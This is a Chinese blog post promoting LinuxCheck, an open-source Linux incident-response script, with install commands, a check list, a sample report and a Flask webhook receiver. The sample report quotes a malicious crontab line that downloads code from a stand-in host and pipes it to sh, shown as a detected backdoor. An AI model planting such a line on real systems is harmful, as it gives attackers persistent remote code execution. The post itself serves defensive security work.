文章总结： LinuxCheck是一款自动化Linux应急响应工具，支持单条命令5分钟内完成70余项安全检查并生成Markdown报告。涵盖系统配置、网络流量、任务计划、恶意软件检测等13大类，支持批量环境报告自动回传。提供零依赖安装和Webhook集成，适用于快速安全排查与交付。 综合评分： 82 文章分类： 应急响应,安全工具,安全运营,终端安全,解决方案

LinuxCheck：一条命令，5分钟扫完70+项应急检查，直接生成交付级报告！

原创

菜狗 菜狗

只会看监控的实习生

2026年4月8日 09:24 广东

🎯 一句话卖点

“一条命令跑完 70+ 项安全检查，5 分钟生成可交付的应急报告——批量环境也能自动回传。”

⚡ 3 秒上手（零依赖）

# ① 本地克隆（推荐，支持报告上传）
git clone https://github.com/al0ne/LinuxCheck.git
cd LinuxCheck && chmod +x LinuxCheck.sh && ./LinuxCheck.sh

# ② 在线速用（无上传，仅供快速排查）
bash -c "$(curl -sSL https://raw.githubusercontent.com/al0ne/LinuxCheck/master/LinuxCheck.sh)"

🧩 检查清单（13 大类 70+ 项）

| 大类 | 子项示例 | 说明 | | — | — | — | | 基础配置 | CPU/内存/磁盘/挂载/常用软件/hosts | 系统信息一键汇总 | | 网络流量 | ifconfig、端口监听、连接、路由、DNS、ARP、iptables | 异常外连、监听端口全扫 | | 任务计划 | 当前用户 & 系统 crontab、创建时间、后门排查 | 隐藏定时任务无处遁形 | | 环境变量 | PATH、LD_PRELOAD、PROMPT_COMMAND、ld.so.preload | 动态库劫持一键发现 | | 用户信息 | 可登录用户、sudoers、last/lastlog、历史 IP | 可疑账号快速定位 | | Services | systemd 运行服务 & 创建时间 | 恶意服务批量展示 | | Bash 审计 | History、profile、rc.local、反弹 shell 检测 | 命令级后门审计 | | 文件审计 | 隐藏文件、SUID、>200M 大文件、最近 7 天改动 | Webshell/大文件/改动追踪 | | 内核 Rootkit | lsmod 可疑模块、符号表、.ko 文件、rkhunter | 内核级后门扫描 | | SSH 安全 | 爆破日志、SSHD 配置、软连接后门、authorized_keys | SSH 入口全检查 | | Webshell | PHP/JSP 特征、可疑上传、一句话检测 | Web 后门专项 | | 挖矿检测 | 进程、文件、WorkMiner、Ntpclient、TeamTNT | 挖矿木马专项 | | 供应链 | Python pip 投毒、Docker 权限、JDWP、Python http.server | 供应链&开发风险 |

📊 报告样例（Markdown 自动输出）

系统信息

• IP：10.0.0.47
• 主机名：web01
• 开机：2024-04-20 08:15
• 负载：0.12 0.08 0.05

异常发现

• [🔴] /tmp/.xxx.sh 隐藏脚本
• [🔴] crontab 后门：*/10 * * * * curl -sS http://bad.com/x | sh
• [🔴] /root/.ssh/authorized_keys 新增未知 key
• [🟡] Docker 守护进程暴露 2375（无认证）

🚀 批量报告自动上传

webhook_url='http://your-server:9999/upload'

服务端接收示例（Flask）：

from flask import Flask, request
app = Flask(__name__)
@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    file.save(file.filename)
    return "OK", 200
if __name__ == '__main__':
    app.run(host="0.0.0.0", port=9999)

📋 参数速查（按需调用）

| 参数 | 说明 | | — | — | | 无参 | 执行全部 70+ 项检查 | | 上传修改 | 改 webhook_url 即可批量回传 | | 报告格式 | Markdown，可直接交付客户 |

回复LinuxCheck获取

低价出售安全证书不限于cisp、pte等请Vme～建了一个项目群，想进群的请回复进群即可

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：只会看监控的实习生 菜狗 菜狗《LinuxCheck：一条命令，5分钟扫完70+项应急检查，直接生成交付级报告！》